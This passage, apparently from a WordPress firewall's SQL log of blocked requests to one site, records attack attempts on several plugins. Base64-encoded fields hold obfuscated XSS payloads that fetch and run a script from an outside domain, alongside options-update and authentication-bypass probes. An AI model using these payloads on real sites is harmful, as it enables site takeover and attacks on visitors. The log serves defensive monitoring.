Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37787,1569949705.827081,1569949703.566900,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=yuzo-related-post',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Related Posts <= 5.12.90 - Missing Authentication','{\"learningMode\":0,\"failedRules\":\"137\",\"paramKey\":\"cmVxdWVzdC5ib2R5W25hbWVfb3B0aW9uc10=\",\"paramValue\":\"eXV6b19yZWxhdGVkX3Bvc3Q=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37822,1569949914.280392,1569949913.236500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37634,1569411123.848439,1569411108.636000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37682,1569411782.264477,1569411781.295000,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3RoaW1fdmFsdWVd\",\"paramValue\":\"WDwvc2NyaXB0PjxzY3JpcHQgICB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBjID0gMDt2YXIgX2FhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTUvKiovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLywxMTkvKiovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA0LypfYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhYWFhYWEqLyw0Ny8qKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA4LyoqLyw0Ny8qKi8sOTkvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTA2LypfYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYWFhYWFhID0gX2FhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYWFhYWFhLmxlbmd0aCA+IDMpe19hYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhYWFhYWEub3BlbiggU3RyaW5nLmZyb21DaGFyQ29kZSg3MSw2OSw4NCksIF9hYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhYWFhYWEucmVzcG9uc2VUZXh0O31mdW5jdGlvbiBfYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWFhYWFhYSgwLDApO308L3NjcmlwdD48c2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37635,1569411106.768349,1569411102.585500,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37642,1569411417.273862,1569411416.238300,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3Jjc3BfZGVzY3JpcHRpb25d\",\"paramValue\":\"PHNjcmlwdCAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYSovLDExNi8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhKi8sNTgvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sNDcvKl9hYWFhYWFhKi8sMTAzLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLyw5Ny8qX2FhYWFhYWEqLywxMTYvKl9hYWFhYWFhKi8sMTAxLypfYWFhYWFhYSovLDExNC8qX2FhYWFhYWEqLyw5OC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sMTE2LypfYWFhYWFhYSovLDEwNC8qX2FhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sNDYvKl9hYWFhYWFhKi8sOTkvKl9hYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYSovLDk3LypfYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYSovLDEwOC8qX2FhYWFhYWEqLywxMDEvKl9hYWFhYWFhKi8sOTcvKl9hYWFhYWFhKi8sMTE0LypfYWFhYWFhYSovLDQ2LypfYWFhYWFhYSovLDEwNi8qX2FhYWFhYWEqLywxMTUvKl9hYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYSA9IF9hYWFhYWFhKF9hYWFhYWFhKTtpZihfYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYShfYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYShfYWFhYWFhYSl7IHZhciBfYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37636,1569411101.537671,1569411100.179700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhYWFhYT1TdHJpbmcuZnJvbUNoYXJDb2RlKDEwNC8qX2FhYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDExMi8qKi8sMTE1LypfYWFhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWFhYWFhKi8sOTgvKiovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWFhKi8sOTgvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLyoqLywxMTQvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYWFhYSovLDk5LypfYWFhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWFhYWFhKi8sMTExLyoqLyw5OS8qX2FhYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYWEgPSBfYWFhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYWEpeyB2YXIgX2FhYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYWFhYWEsIGZhbHNlICk7X2FhYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWFhYWFhKHRvZG8peyB2YXIgX2FhYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0PjxzY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37793,1569949668.195112,1569949666.961700,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site 